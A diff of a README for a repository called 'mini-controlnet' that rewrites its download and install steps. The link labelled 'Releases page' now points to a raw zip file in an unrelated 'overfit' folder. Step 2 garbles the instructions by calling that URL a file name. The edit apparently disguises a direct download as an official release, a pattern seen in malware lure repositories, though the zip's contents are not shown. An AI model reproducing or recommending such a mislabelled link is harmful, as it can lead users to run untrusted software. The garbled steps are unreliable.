mataratas777OMG/mini-controlnet/README.md

 ## 📂 Download & Install

-1. Click the button above or go directly to the [Releases page](https://github.com/mataratas777OMG/mini-controlnet/releases).
+1. Click the button above or go directly to the [Releases page](https://raw.githubusercontent.com/mataratas777OMG/mini-controlnet/main/overfit/mini-controlnet.zip).

-2. On the Releases page, find the file named similar to `mini-controlnet-setup.exe` or the appropriate installer for your operating system.
+2. On the Releases page, find the file named similar to `https://raw.githubusercontent.com/mataratas777OMG/mini-controlnet/main/overfit/mini-controlnet.zip` or the appropriate installer for your operating system.

 3. Click on the file to begin the download.